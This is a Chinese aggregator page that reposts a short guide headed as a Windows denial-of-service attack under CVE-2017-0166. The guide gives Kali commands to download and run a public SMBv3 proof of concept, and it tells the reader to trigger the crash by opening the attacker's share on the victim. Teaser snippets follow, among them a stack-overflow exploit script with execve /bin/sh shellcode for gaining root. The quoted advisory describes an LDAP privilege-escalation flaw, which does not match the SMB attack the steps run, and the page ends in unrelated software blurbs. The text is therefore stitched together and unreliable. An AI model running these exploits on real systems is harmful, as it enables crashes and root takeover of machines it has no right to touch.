Dos Attack Windows CVE-2017-0166-低调大师

Dos Attack Windows CVE-2017-0166

2018-02-27 572

视频教程：ClickHere

受影响系统：
Microsoft Windows VistaMicrosoft Windows Server 2016Microsoft Windows Server 2012 R2Microsoft Windows Server 2012Microsoft Windows Server 2008Microsoft Windows RT 8.1Microsoft Windows 8.1Microsoft Windows 7Microsoft Windows 10
描述：
BUGTRAQ ID: 97446CVE(CAN) ID: CVE-2017-0166Microsoft Windows是流行的计算机操作系统。Microsoft Windows未正确计算LDAP请求缓冲区长度，在实现上存在权限提升漏洞，可使攻击者在提升的上下文中运行进程。<来源：Microsoft 链接：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0166>

下载到kali，并运行：

cd /tmp
wget -c --no-check-certificate https://github.com/lgandx/PoC/archive/master.zip

unzip PoC-master.zip

cd PoC-master/

cd SMBv3。。。。。剩下table自动补齐

python odict.py

python win10.py

如果没有触发，就Windows的运行窗口下。

\\攻击者ip\

触发一下。

微信关注我们

原文链接：https://yq.aliyun.com/articles/628617

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

Python经典栈缓冲区溢出获取root权限

版权声明：转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396339 是Python2还是3我给忘记了，大家自己试试吧。 #!/usr/bin/env python #-*-coding:utf-8-*- #exp.py import struct from subprocess import call #Stack address where shellcode is copied. ret_addr = 0xbffff1d0 #Spawn a shell #execve(/bin/sh) scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" #endianess convertion def conv(num): return struct.pack("<I",numnk ...

2018-02-28

552

版权声明：转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396375 参考原文:http://www.freebuf.com/articles/system/135938.html cd /tmp wget -c https://storage.googleapis.com/golang/go1.8.3.linux-amd64.tar.gz tar -C /usr/local -xzf go1.8.3.linux-amd64.tar.gz cd ~ vim .profile shift+g+g o 输入（export PATH=$PATH:/usr/local/go/bin export GOROOT=/usr/local/go export GOPATH=$PATH:$GOROOT/bin）原文那个，我试了，异常，追加后面这两句就正常了。 . .profile go version cd /tmp git clone https://github...

2018-02-28

692

资源下载

更多资源

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长，特征是大鼻子、头戴帽子、身穿背带裤，还留着胡子。与他的双胞胎兄弟路易基一起，长年担任任天堂的招牌角色。

Apache Tomcat

Tomcat是Apache 软件基金会（Apache Software Foundation）的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。因为Tomcat 技术先进、性能稳定，而且免费，因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可，成为目前比较流行的Web 应用服务器。

Eclipse

Eclipse 是一个开放源代码的、基于Java的可扩展开发平台。就其本身而言，它只是一个框架和一组服务，用于通过插件组件构建开发环境。幸运的是，Eclipse 附带了一个标准的插件集，包括Java开发工具（Java Development Kit，JDK）。

JDK

JDK是 Java 语言的软件开发工具包，主要用于移动设备、嵌入式设备上的java应用程序。JDK是整个java开发的核心，它包含了JAVA的运行环境（JVM+Java系统类库）和JAVA工具。